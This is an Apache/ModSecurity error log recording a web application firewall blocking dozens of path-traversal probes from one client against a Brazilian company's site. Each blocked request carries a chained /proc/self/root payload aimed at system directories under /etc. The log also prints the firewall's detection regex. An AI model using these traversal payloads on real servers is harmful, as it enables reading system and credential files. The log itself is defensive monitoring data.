[Tue Mar 17 16:55:29.041976 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:38370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxsRj0p0SRWAqcjGGKzwAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:32.900758 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:38378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxtHIk7brgkOH-rIWd2QAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:35.816671 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.241.31:38382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxt64xEDsg_V3ESNZc7wAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:38.783271 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:47702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxuq4xEDsg_V3ESNZc9AAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:39.129790 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43226] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:55:42.287411 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.241.31:47712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxvq4xEDsg_V3ESNZc-gAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:48.233523 2026] [:error] [pid 7004:tid 140411683178240] [client 74.7.241.31:45254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxxMU6Sx0TG1YjmQjANQAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:50.368033 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:45262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxxgeiSKl8TjouI-YpXgAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:53.265540 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:45274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxyYh-PF_25v4hFRB8lAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:56.344853 2026] [:error] [pid 18380:tid 140411590858496] [client 74.7.241.31:45282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxzK4xEDsg_V3ESNZc_QAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:55:59.334041 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:48372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmxz9a6ubjKNq_cu4YZsAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:00.317365 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:48372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx0Na6ubjKNq_cu4YZsQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:02.162369 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:56:03.327027 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:48386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx08U6Sx0TG1YjmQjAPwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:04.778965 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:48392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx1AeiSKl8TjouI-YpYwAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:07.739174 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:48706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx19a6ubjKNq_cu4YZtQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:10.650442 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:48708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx2qBJNF7axNlVR0UqCAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:12.661593 2026] [:error] [pid 2598:tid 140411599251200] [client 74.7.241.31:48718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx3Bj0p0SRWAqcjGGK3gAAAxE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:14.151297 2026] [:error] [pid 29151:tid 140411716749056] [client 74.7.241.31:48728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx3vPqhzTj3BvfDX-ZKQAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:15.747691 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:48734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx39a6ubjKNq_cu4YZtwAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:18.646691 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:55882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx4qBJNF7axNlVR0UqEQAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:21.725153 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.241.31:55892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx5QeiSKl8TjouI-YpagAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:25.141815 2026] [proxy_fcgi:error] [pid 7437:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44514] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:56:26.227508 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.31:55896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx6qBJNF7axNlVR0UqFgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
